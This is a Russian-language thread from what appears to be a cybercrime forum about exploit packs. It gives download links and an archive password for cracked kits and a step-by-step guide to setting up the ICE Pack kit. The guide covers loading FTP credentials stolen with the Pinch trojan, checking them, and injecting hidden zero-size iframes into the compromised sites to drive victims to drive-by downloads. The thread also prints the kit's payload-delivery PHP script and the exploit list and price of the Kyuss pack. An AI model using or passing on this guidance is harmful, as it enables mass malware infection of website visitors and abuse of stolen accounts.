• XSS.stack #1 – первый литературный журнал от юзеров форума

Связки сплойтов...

Отслеживать
E.N.G.Land, Там yes 2, beta 2, старая версия в общем

Ниже 2 варианта yes 2, под ioncube, привязанные к разным доменам.

Первый вариант можно найти в одном осеннем блеке.
Cсылка на одну из тем про блек: ]http://www.kiber-zona.org/lofiversion/inde...

File: 1_2009_11.rar
http://www.sendspace.com/file/3ljgn2

File: 2_2010_01.rar
http://www.sendspace.com/file/xeg81x

Pass: dsadasidh%$bdfsdbfdfjkkfv45tg463hXAF
 
Ктонить может помочь настроить связку из паблика!
Для этого случая у меня валяется моя статейка не помню какого года на примере всем известного ICE PACK... И так, сама статейка:
Ice Pack как его юзать...
Итак Сегнодня мы поговорим свами про Експлоит ICE Pack Platinum. Большенсто народу знает что такое "Експлоит", для тех что этого незнает объясню популярно: Это грубо говара "программа/скрипт" который(ая) генерирует специальный запрос в в результате чего происходят какие либо действия.
Мы сегодня говорим про пакет сплоитов, что он из себя представляет:
1) Стандартный набор сплоитов.
2) Лоадер файлов.
3) Статистика посещаимости/загрузок.
4) Фтп Чекер, тамже скрипт который вставляет код iframe. (Что такое iframe опишу позже.)
5) Фильтр трафика.
Это самые основные функции которые я использую в данном Експлоите. Итак, что нам надо для работы с данным експлоитом:
1) Зарегестрировать какойнибуть хостинг, либо просто его купить. Проще и быстрее будет его зарегестрировать. Для этого есть например вот эти хостеры: www.jino-net.ru или www.hut.ru
2) Залить на хост все фаилы необходимые для работы Експлоита.
3) Отредактировать фаил db.php, что так вообще есть :
***
define ("DBHOST", "адрес до базы данных");
define ("DBNAME", "имя базы данных");
define ("DBUSER", "Пользователь базы данных");
define ("DBPASS", "И конечно же пароль");
***
Но прежде чем всё это делать, надо создать саму базу данных, на разных хостах это делается по разному... поэтому тут вам придётся немного проявить смекалку и сообразительность.
Как тока вы всё это сделали, настроили db.php, сохраняем настройки и пережодим к установке Експлоита. Но для начала нам необходимо выставить права на папки и файлы:
***ПРАВА ЗАПИСИ И ЧТЕНИЯ*777***
Папка load,
папка admin/tmp
файл config.php
*****************
Это важно, поскольку эти настройки будут менятся в зависимости от настроек Експолита.
GeoIP.dat для того что бы можно было по IP адресу можно было определить страну. Мы распаковываем его из архива и тоже заливаем на хостинг в директорию с Експлоитом.
Выполняем файлик install.php, и вооля, видем что нам говорят: Уснановка успешно завершена, или что то похожее на это и предлагают зайти и настраивать дальше. В случае если у вас там появляются какието ошибки, это значит что вы что то недоделали и где то в чём то ошиблись.
Заходим на титульный лист админки (www.syte.ru/admin/) и видем логотип ICe Pack ну и всё такое, вводим логин и пароль, и видем примерно вот это: , тут описывается версия пхп на хостинге, использование MySQL, использование SaveMode, Общее чесло посищений... Вверху у нас есть кнопки, мы выбераем
ИНСТРУМЕНТЫ и в выпадающей строка нункт НАСТРОЙКИ и видем вот это:
[img]http://imageshost.ru/img/457c2efdc8f1ef63be2bcb30f9a041f0/80cf3b4d954219b2229a157506144a08.jpg Тут у нас есть:
1) URL Скрипта, тут необходимо прописать адрес до места где установлен Експлоит(http://syte.ru)
2) Имя пользователя (по умолчанию "root")
3) Пароль пользователя (по умолчанию "toor")
4) Файл для загрузки (Данный фаил будет загружатся и выполнятся при успешной работе Експлоита)
Жмём кнопку сохранить, и идём дальше...
*****Работа с FTP*****
Жмйм туда и опять выпадающая строка, выбераем импорт видем вот это:
9b7baff1fc325003d5aed4ad35fed0b3.jpg

Жмём обзор, выбераем файл в котором записаны FTP аккаунты... <<Самый интересный Вопрос откуда бы нам их взять, простой ответ, используйте в качестве фаила для Експлоита Pinch 2.99. Или другие трояны.>>
Жмём начать, и тут скрипт загружет нам фпт из файла на хост.
Спускаемся ещё ниже...
**Проверка Фтп(FTp Checker)**
Тотже процесс, Работа с фтп..Проверка видем вот жто:
325a99ff30d24d60bfde09b9d7a5fa5b.jpg
тут мы видем что кнопку НАЧАТЬ, нажимаем её, и ссылка: <<просмотр процесса>> нажимаме туда, видем как идёт процесс проверки ФТП акаунтов, видем какой у них PR, чем больше тем лучше... ЧТо такое PR можно почитать тут.
Как тока унас всё прочекалось мы перебираемся в самы низ, выбираем пункт ОЧИСТКА, там появляются 3 пунктика:
1) Удаление нерабочих FTP
2) Удаление рабочих FTP
3) Удаление всех FTP
Нам нужен только 1(Удаление нерабочих FTP), ставим туда точечку и жмём НАЧАТЬ.
Итак наконецто мы пришли к сакоку интересному, ТРАФИК, откуда бы нам его взять, и как это осуществить?...
***Устанавливаем Код iframe***
Для начала, что такое iframe: Пишу простыми словами, это грубо говаря открытее окна в окне, что бы всем было понятно... расмотрим код:<iframe src="http://Syte//index.php" width="0" height="0"></iframe>
Нас интересует вот это: width="0" height="0".
width="0"- Высота окна 0
height="0" - Ширина окна 0
Это делается для того что бы неспалить где находится нашь сплоит и что там вообще происходит, человек заходит на сайт на котором весит iframe, его браузер автоматически загружеает САЙТ на оторый он зашол, и тут выполнряется код iframe, он заходит на сплоит, если он срабатывает, то фаил будет загружен и выполнен.
Как нам это проернуть? А вот так:
Заходим в РАБОТА с ФТП, и выбераем Установить Код, появляется вот такое окно:
505a37d0c67fdfd16f0cfbd7a2df5081.jpg

В середине окна поле ввода, тут мы пишем код ифрайма, а где нам его взять?
Мы переходим на закладку ИНСТРУМЕНТЫ и выбераем пункт КОД iframe, вот что вы там должны увидеть:
57044b425e0e576b4862a89df16b6d3d.jpg
, копируем код из Level 0 или Level 2, кому как больше нравится.
Вперходим на Работа с ФТП, вставить код, в поле копируем нашь код, выбераем что делать с файло Index.php(.html, и т.д) а можем мы вот что:
1) Запись перед </body>
2) В конец файла
3) Перезапись файлов
И дополнительная функция: Удалять фреймы.
Эта функция удалет ваши старые или чужие коды iFrame, что бы трафик шол тока к вам, я обычно её включаю, но это дело вкуса.
Жмём кнопочку НАЧАТЬ и как всегда переходим на ссылку [просмотру прогресса], и смотри как на ваши FTP Акаунты устанавливается iFrame код.
***Конец***
Ну что же на этом я заканчиваю это статейку, желаю всем приятного время припровождения.
***************
Автор продукта ненесёт ответственности за ущерб нанесённый даннов программой, посколку она была придумана строко в ознакомительныйх целях и для проверки собственной безопасности.
**************
ЗЫ: Сори за масштаб...
ЗЫЫ: По образу и подобию можно поставить любую связку... принцип один и тот же...
 
На данном примере можно настроить любую связку по образу и подобию, стоит всего лишь малость покопаться и разобраться что к чему.... Удачного пользования.
 
> Работа с FTP

не совсем ясно, какова функция FTP аккаунтов в работе эксплоита, если файл для загрузки находится на том же сервере, где и Exploit pack, и загружается с сервера? Или функция FTP аккаунтов только в том, чтобы хранить там html страницы с iFrame кодом? Можно ведь страницы с iFrame размещать на разных free hosting? Как много нужно FTP аккаунтов?
 
> работа с фтп
в айс паке загружаются фтп и чекаются на валидность, так же их можно проифреймить.
 
exe.php
Код: 
<?php
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	IcePack Platinum Edition
-----------------------------------------------------
	2007 (c) IDT Group
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

include "db.php";
include "mysql.php";

$db = new db;
$ip = getenv("REMOTE_ADDR");
$db->query("UPDATE statistics SET is_dw=1 WHERE ip='".$ip."'");

if (isset($_GET['qt']))
{
	header("Pragma: public");
	header('Expires: '.gmdate('D, d M Y H:i:s').' GMT');
	header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
	header("Cache-Control: private",false);
	header("Content-Type: video/quicktime");
	header('Content-Disposition: attachment; filename="./exploits/movie.bin"');
	header("Content-Transfer-Encoding: binary");
	header('Content-Length: '.filesize("./exploits/movie.bin"));
	@readfile("./exploits/movie.bin");
	exit();
}

$filename = "./load/file.exe";
$size = filesize($filename);
$fp = fopen($filename, "r");
$source = fread($fp, $size);
fclose($fp);

header("Accept-Ranges: bytes\r\n");
header("Content-Length: ".$size."\r\n");
header("Content-Disposition: inline; filename=".$filename);
header("\r\n");
header("Content-Type: application/octet-stream\r\n\r\n");
echo $source;

?>
$filename = "./load/file.exe";
При обращении к скрипту он выдаст файл с именем $filename, а именно в данном случае file.exe. Да, сплоит грузит файл с сервера где установлен сплоит, не нужно никаких ftp или чего то ещё....
 
smartRYX Просвятись на тему "отчекать ftp", "iframe, проифрэймить сайт". Тогда для тебя все понятнее будет. А разжевывать и в рот ложить - это не к нам. Няньки в отпуске.
 
smartRYX Просвятись на тему "отчекать ftp", "iframe, проифрэймить сайт". Тогда для тебя все понятнее будет. А разжевывать и в рот ложить - это не к нам. Няньки в отпуске.
Ar3s, все то, что ты перечислил, я знаю. Не в терминологии дело. Я просто хотел уточнить.
 
smartRYX, на связку эксплоитов нужно лить трафик. Для этого на взломанные сайты вставляют ифрейм. Обычно это делается отдельной программой. Но в IcePack есть встроенная, передаёшь списки FTP, а она может проверить на валидность и приписать ифрейм. Это и есть "работа с FTP".
 
Чего-то особенно нового среди связок не видно.. В основном используются 8-10 известных эксплоитов, различия в основном в деталях, дизайне админки.
Вот, например, Kyuss Exploit Pack - переработанная версия Fragus. Использует 10 сплоитов:

* MDAC
* MS DirectShow
* MS09-002
* MS Spreadsheet
* MS Snapshot
* MS COM
* MS IE "iepeers.dll" Remote Code Execution
* MS IE multiple ActiveX bugs
* Java
* PDF all (Util.printf, Collab.collectEmailInfo, Collab.getIcon and newplayer)

Указывается, что переписано 75% кода (all exploits new, encoder new, etc) Price: 800USD

:screenshot: Kyuss
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх